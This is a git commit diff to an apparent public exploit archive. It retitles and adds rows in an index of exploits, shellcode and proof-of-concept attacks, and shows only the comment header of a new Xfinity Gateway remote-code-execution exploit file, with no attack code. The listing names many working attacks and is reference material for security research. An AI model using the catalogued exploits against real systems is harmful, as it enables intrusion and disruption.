DB: 2016-12-04

2 new exploits FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC) FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC) freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC) FreeSSHd 1.2.4 - Denial of Service freeSSHd 1.2.4 - Denial of Service FreeSSHd - Denial of Service (PoC) freeSSHd - Denial of Service (PoC) onehttpd 0.7 - Denial of Service OneHTTPD 0.7 - Denial of Service FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service FreeSSHd 1.3.1 - Denial of Service freeSSHd 1.3.1 - Denial of Service Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104) Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104) Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009) Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009) Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058) Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058) FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow freeSSHd 1.2.1 - Authenticated Remote SEH Overflow FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH) freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH) FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) FreeSSHd 2.1.3 - Remote Authentication Bypass freeSSHd 2.1.3 - Remote Authentication Bypass FreeSSHd 1.2.6 - Authentication Bypass (Metasploit) freeSSHd 1.2.6 - Authentication Bypass (Metasploit) Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084) Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084) Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection Joomla! Component MyContent 1.1.13 - Blind SQL Injection Xfinity Gateway - Remote Code Execution
2016-12-04 05:01:23 +00:00 · 2016-12-04 05:01:23 +00:00 · 0a2e79b884
commit 0a2e79b884
parent 4b3da08aa9
3 changed files with 125 additions and 19 deletions
--- a/files.csv
+++ b/files.csv
@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
-5709,platforms/windows/dos/5709.pl,"FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
 5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
@ -835,9 +835,9 @@ id,file,description,date,author,platform,type,port
 6756,platforms/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0
 6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",windows,dos,0
 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0
-6800,platforms/windows/dos/6800.pl,"FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
-6812,platforms/windows/dos/6812.pl,"FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
+6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
@ -1440,7 +1440,7 @@ id,file,description,date,author,platform,type,port
 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0
 11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
-11842,platforms/windows/dos/11842.py,"FreeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
+11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0
 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
@ -2089,7 +2089,7 @@ id,file,description,date,author,platform,type,port
 18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
-18268,platforms/windows/dos/18268.txt,"FreeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
+18268,platforms/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos,0
 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
 18270,platforms/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos,0
 18271,platforms/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos,0
@ -3519,7 +3519,7 @@ id,file,description,date,author,platform,type,port
 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0
 27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0
 27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0
-27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
+27553,platforms/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080
 27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0
 27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x - JPEG and TGA Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",linux,dos,0
 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0
@ -3930,7 +3930,7 @@ id,file,description,date,author,platform,type,port
 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
-31218,platforms/linux/dos/31218.txt,"FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
+31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0
 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0
 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0
 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
@ -4609,7 +4609,7 @@ id,file,description,date,author,platform,type,port
 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0
 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0
 37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0
-38001,platforms/windows/dos/38001.py,"FreeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
+38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0
 37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
@ -5264,7 +5264,7 @@ id,file,description,date,author,platform,type,port
 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
 40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttpHeaderParser::ParseStatusLine Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
-40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
+40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::HandleStyleComponentProperty' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttrArray::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
 40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
@ -5286,7 +5286,7 @@ id,file,description,date,author,platform,type,port
 40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRunPointer::SpanQualifier/RunType' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGeneratedContent::HasGeneratedSVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEditAdorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
-40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
+40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8337,7 +8337,7 @@ id,file,description,date,author,platform,type,port
 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
 37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
-37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
+37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0
 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
 1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
-1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
+1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
 1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
-8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
+8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
+16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
 23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
-23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
+23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
-24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
+24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
@ -15096,7 +15096,7 @@ id,file,description,date,author,platform,type,port
 40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0
 40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
 40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
-40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
+40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
 40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
 40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
@ -15116,6 +15116,7 @@ id,file,description,date,author,platform,type,port
 40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
 40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -18802,7 +18803,7 @@ id,file,description,date,author,platform,type,port
 5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
-5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
+5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
@ -36837,3 +36838,4 @@ id,file,description,date,author,platform,type,port
 40851,platforms/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0
 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0
 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0
--- a/platforms/hardware/webapps/40856.txt
+++ b/platforms/hardware/webapps/40856.txt
@ -0,0 +1,33 @@
 # Exploit Title: Xfinity Gateway: Remote Code Execution
 # Date: 12/2/2016
 # Exploit Author: Gregory Smiley
 # Contact: gsx0r.sec@gmail.com
 # Vendor Homepage: http://xfinity.com
 # Platform: php
